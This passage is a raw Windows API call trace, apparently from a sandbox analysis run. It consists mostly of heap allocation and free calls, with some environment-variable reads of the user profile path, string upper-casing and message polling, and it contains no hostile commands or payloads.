Flags=0x0, Size=0x10) returned 0x2aab110 [0217.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0217.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaae40 [0217.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0217.405] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0217.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0217.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0217.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0217.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0217.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0217.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0217.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0217.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0217.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0217.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0217.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0217.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0217.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0217.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0217.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f80 [0217.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0217.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x38545d8 [0217.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0217.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0217.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0217.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0217.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0217.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0217.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0217.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0217.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f80 | out: hHeap=0x2af0000) returned 1 [0217.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0217.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0217.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72258 [0217.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0217.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0217.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0217.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0217.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0217.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0217.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0217.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0217.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0217.407] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0217.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0217.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0217.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab008 [0217.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0217.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0217.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf90 [0217.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0217.407] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0217.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0217.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0217.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0217.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0217.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0217.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0217.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0217.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0217.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0217.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0217.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0217.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0217.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0217.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0217.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0217.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0217.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854dd0 [0217.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0217.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0217.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0217.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0217.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0217.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0217.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0217.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0217.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0217.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72328 [0217.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0217.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0217.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0217.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0217.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72368 [0217.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0217.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0217.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0217.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaff0 [0217.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0217.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0217.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0217.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0217.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0217.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0217.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0217.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0217.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0217.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0217.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0217.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0217.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0217.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0217.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0217.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0217.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0217.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0217.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0217.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0217.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0217.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0217.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0217.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0217.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0217.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0217.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0217.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0217.410] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0217.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0217.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0217.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0217.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0217.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0217.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0217.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0217.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0217.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0217.410] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0217.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0217.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0217.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0217.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0217.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0217.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0217.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0217.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0217.411] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0217.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0217.411] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0217.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0217.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0217.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0217.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0217.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0217.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0217.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0217.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0217.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0217.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0217.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0217.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0217.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0217.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0217.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0217.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0217.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0217.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0217.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0217.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0217.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0217.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0217.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0217.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0217.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0217.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0217.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0217.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0217.412] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0217.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0217.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0217.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0217.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0217.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0217.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0217.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0217.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0217.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0217.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0217.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0217.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0217.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0217.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0217.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0217.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0217.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0217.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0217.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0217.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0217.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0217.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0217.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0217.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0217.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0217.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0217.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0217.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0217.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0217.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0217.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0217.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0217.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0217.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0217.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0217.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0217.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0217.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0217.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0217.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0217.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0217.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0217.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0217.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0217.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0217.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0217.414] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0217.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0217.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0217.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0217.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0217.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0217.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0217.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0217.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0217.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0217.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0217.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0217.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0217.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0217.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0217.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0217.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0217.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0217.415] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0217.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0217.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0217.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0217.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0217.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0217.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0217.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0217.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0217.415] RtlAllocateHeap 